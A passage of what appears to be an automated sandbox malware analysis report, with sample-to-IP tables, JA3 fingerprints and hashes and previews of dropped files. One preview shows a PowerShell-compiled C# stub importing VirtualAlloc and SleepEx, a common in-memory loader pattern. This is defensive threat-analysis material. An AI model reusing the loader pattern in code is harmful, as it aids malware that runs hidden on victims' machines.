                          • 18.196.46.14
                          9hPGWxrcih.dllGet hashmaliciousBrowse
                          • 18.196.46.14
                          dF05T33wbdGet hashmaliciousBrowse
                          • 34.249.145.219
                          w5CIVsOxCJGet hashmaliciousBrowse
                          • 3.156.46.99
                          MidM0aH8AtGet hashmaliciousBrowse
                          • 54.171.230.55
                          arm7Get hashmaliciousBrowse
                          • 13.222.54.154
                          0x0005000000012636-65.exeGet hashmaliciousBrowse
                          • 54.239.28.85
                          yxmaor9bkzqc8cpGet hashmaliciousBrowse
                          • 34.249.145.219
                          Insurance_template.rtfGet hashmaliciousBrowse
                          • 54.239.28.85
                          RT.msiGet hashmaliciousBrowse
                          • 52.219.96.48
                          diBfYpFaeM.exeGet hashmaliciousBrowse
                          • 52.219.66.7
                          0AD97BE849C854DDEA3A0DF0597C8E9B2DC8DD4D274B9.exeGet hashmaliciousBrowse
                          • 3.142.167.54
                          Invoice_#fdp..exeGet hashmaliciousBrowse
                          • 54.239.28.85
                          bHqFqBDrr5.dllGet hashmaliciousBrowse
                          • 13.32.157.71
                          29MA429K1PGet hashmaliciousBrowse
                          • 54.171.230.55
                          RFQ-PO 31336.xlsmGet hashmaliciousBrowse
                          • 3.69.238.46
                          41111.xlsxGet hashmaliciousBrowse
                          • 3.112.194.196
                          MiYUB3l97mGet hashmaliciousBrowse
                          • 143.204.98.23
                          Item No 31111.xlsxGet hashmaliciousBrowse
                          • 3.112.194.196
                          V4ESCROW-ASRO61b85f75e6a7c.dllGet hashmaliciousBrowse
                          • 79.110.52.144
                          B2EIJMKgSt.exeGet hashmaliciousBrowse
                          • 79.110.52.59
                          #Uacac#Uc801 PO#8080715-10-2021 KTR-151020-21-#Uc8fc#Ubb38.exeGet hashmaliciousBrowse
                          • 79.110.52.111
                          LiicMQN1iQ.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          JCn2Ugbqee.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          0kZQoyA8lm.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          C1QpGTKpb4.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          2GQL8eREln.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          h9ODxK7W0a.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          FaBrzRLl62.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          lo0al3uj17.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          TQ1p5E2sT4.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          TuOb8Fs15Q.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          b4rNxlfTda.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          K7Cwu7R32X.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          xJXQD5aK51.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          EIsQYYsTbB.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          d5zZ6bB1nU.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          xNzTyEUy1e.exeGet hashmaliciousBrowse
                          • 91.245.253.52
                          P2vZPsJOCy.exeGet hashmaliciousBrowse
                          • 91.245.253.52

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          ce5f3254611a8c095a3d821d4453987761b85f75e6a7c.dllGet hashmaliciousBrowse
                          • 79.110.52.144
                          R0c5Z733SP.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          NF4JgDw9LJ.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          dec_order.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          g8DE6t8o5H.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          lepdHVzKGs.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          pwY7l6DVfX.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          JlF5uYbq4K.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          SYBJyKTdhN.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          kBeiYpbuqG.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          fd862143z1.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          bHqFqBDrr5.dllGet hashmaliciousBrowse
                          • 79.110.52.144
                          34CCAE63B50259B758A5B68F579077E5152D9568CD1F9.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          r6yDVfoNWL.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          VAxh74b69I.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          KT66ytYEtw.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          MoDa1Ehl7V.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          SecuriteInfo.com.Win64.Packed.Enigma.BV.28332.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          DY6NIa6uCJ.exeGet hashmaliciousBrowse
                          • 79.110.52.144
                          EiciKS0ik4.exeGet hashmaliciousBrowse
                          • 79.110.52.144

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11606
                          Entropy (8bit):4.883977562702998
                          Encrypted:false
                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                          Malicious:false
                          Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1192
                          Entropy (8bit):5.325275554903011
                          Encrypted:false
                          SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                          MD5:05CF074042A017A42C1877FC5DB819AB
                          SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                          SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                          SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                          Malicious:false
                          Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          C:\Users\user\AppData\Local\Temp\RES11BF.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                          Category:dropped
                          Size (bytes):1328
                          Entropy (8bit):3.9923065968914804
                          Encrypted:false
                          SSDEEP:24:HCe9E26c3tuHrhKdNII+ycuZhNqlcakS7lxPNnq9qd:8c3tuVKdu1ulqaa37Bq9K
                          MD5:27C528436B2B3C05916BE7800A1BDCA3
                          SHA1:26B8F391092F85DDFD9F5820E91C7EEA36070D53
                          SHA-256:608F560F77DFA1AC315ABF79CE35E71EBD5E090F1E1335C5E6B4E38995128647
                          SHA-512:7CF7A7C94D4FEC56DC2145DCDDF6F0AD6BD71835ABCB81F1B90BD6817D12989F2063660385122EA17C8DF758058F975FBC3372A1EC83E8F0F030D8B7CE836EC4
                          Malicious:false
                          Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP...............{....|.m....[...........5.......C:\Users\user\AppData\Local\Temp\RES11BF.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                          C:\Users\user\AppData\Local\Temp\RES148E.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                          Category:dropped
                          Size (bytes):1332
                          Entropy (8bit):4.003514269567322
                          Encrypted:false
                          SSDEEP:24:HdzW9Nv9U8uHvhKdNII+ycuZhNoakS0PNnq92d:01U8upKdu1uloa3Uq9G
                          MD5:29E70867DFDE4F487090ABBBCB2B484F
                          SHA1:31B7F94349888DF87A60D3A792DF85D31460CA2E
                          SHA-256:C9C2C56C48B397FB5BB9ACFDF50E2ED7EFE06542BAE0BEC0A5581231FA63B8F1
                          SHA-512:43BBC13236AD8C9178FA4BD1CCF0179419EAA5FDA7C8A79B59B814557BAD0125F85D9712070021B5C6D9210138C5E3F1894F8B2CED4CBD2BA973FAB72322ADCA
                          Malicious:false
                          Preview: L.....a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP..................t..).D.>U...N.._..........5.......C:\Users\user\AppData\Local\Temp\RES148E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                          C:\Users\user\AppData\Local\Temp\RES1B16.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                          Category:dropped
                          Size (bytes):1328
                          Entropy (8bit):4.001534923476038
                          Encrypted:false
                          SSDEEP:24:HYe9E26qW2KuHrFhKdNII+ycuZhNtakS7PNnq9qd:eqzKuLzKdu1ulta3xq9K
                          MD5:40F552368035B59FB38A94FC74FE0504
                          SHA1:6C04143209198C63E8E2315435BC3EB3B99BB259
                          SHA-256:6EE40A1F274E2A37AE5C850C15BC241463652ED312820B9CCCAEB7BB1C822CF1
                          SHA-512:F45BE36ED243E5F7F0E496EFE5171BAA7FD1BE3A0F83AB01300C05B09AC10D98897679338F4CFB30F25FC5BCB2D2DE34163BD339B79A65E45DCCEE7A21174603
                          Malicious:false
                          Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP.................g..{.z..$6Kgu1..........5.......C:\Users\user\AppData\Local\Temp\RES1B16.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                          C:\Users\user\AppData\Local\Temp\RES451.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                          Category:dropped
                          Size (bytes):1328
                          Entropy (8bit):3.975200179964607
                          Encrypted:false
                          SSDEEP:24:HOe9E26LWbhknZHFhKdNWI+ycuZhN+akS2PNnq9qd:ILtZTKd41ul+a3Kq9K
                          MD5:2997036F1D6399BDEDC49939CBDB26D4
                          SHA1:FBA41FB870A14910B1BC32C973C39C8C80458E93
                          SHA-256:F4A370736333FC785FE73DBD7468D3FF3B2003BE891BDA032A3C2994614A495F
                          SHA-512:D7054F26A09ABB72827D6AA50382AB19950F48954DD8EACE5A7855487516ED0DB28C0BB6AB2C00CB2D740C50D4EDD68B567BE1EA8EDE1B1D17119991413829A9
                          Malicious:false
                          Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP...............,....d.8.O..J.._..........4.......C:\Users\user\AppData\Local\Temp\RES451.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccsd0th.iwn.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zreigz2.4ov.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34kodmfv.oiy.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgdeyylx.qwp.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjo40dyp.crc.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_karhuzep.53l.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnjjoctr.bdk.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                          C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.226640803853184
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fReHW6zxs7+AEszI923fReHWRyA:p37Lvkmb6KzJYW6WZE2JYWRyA
                          MD5:0D4DF55C848FD70C7E467D2A26D53F45
                          SHA1:F4B759DBF60B7BD4760AEEE2865A47EA64FE59BC
                          SHA-256:65AD1A8591B4C85B19C20F7CB6F215675131DC225B6397BAC64CF9BA285E7F6C
                          SHA-512:5855ED3F00032735847AA9F6B55DAD2607E959509E5EDCA111693CC59EBDF9F3C298FB6A39940BC5603C94F8A5D60E97788FCE82E9BE48A955013F8D0C00438A
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"
                          C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.320286032288214
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzSWbE2SWRy1KaM5DqBVKVrdFAMBJTH:Akka6aSmE2S6y1KxDcVKdBJj
                          MD5:FA46AB7E9BCF97E847F3322DB66934B8
                          SHA1:49552871F35929703C3CD5F33753436E21017849
                          SHA-256:C1CEBB10D75BF73B1B70A7855F8EC4923B79BD07EA173CB98395C0969369AE0F
                          SHA-512:FD5320F3AA7B95C4D9340BAF9358215D08AF44F6A0BEE8A9764E07FA897B4B6FA2E493B87FAF454D1A957B1F95A3CA02854BE2E892471416C046D755BDB8423B
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\CSC7C356A6CF33949CF872753BDA33569A0.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.073206673156649
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyHak7YnqqpQPN5Dlq5J:+RI+ycuZhNYHakSpQPNnqX
                          MD5:5D58A66193F5DD7122F936E757049652
                          SHA1:21888C5F01076812CAB34CA539D7AFF39C3B8C91
                          SHA-256:0735A78CEDD997EA2580034E6867C7010C496B55B3A12DADD449C590F098EDA2
                          SHA-512:5F45E1D4529795A6627FF8BA212FEC06B42F660D23AF9F53AC57AACD0C5D3C51056CC1B2722AD7AA35EC4CDC8C6531A656AEDA2F28501F112037A71522FC3D80
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.n.s.o.f.l.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.t.n.s.o.f.l.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
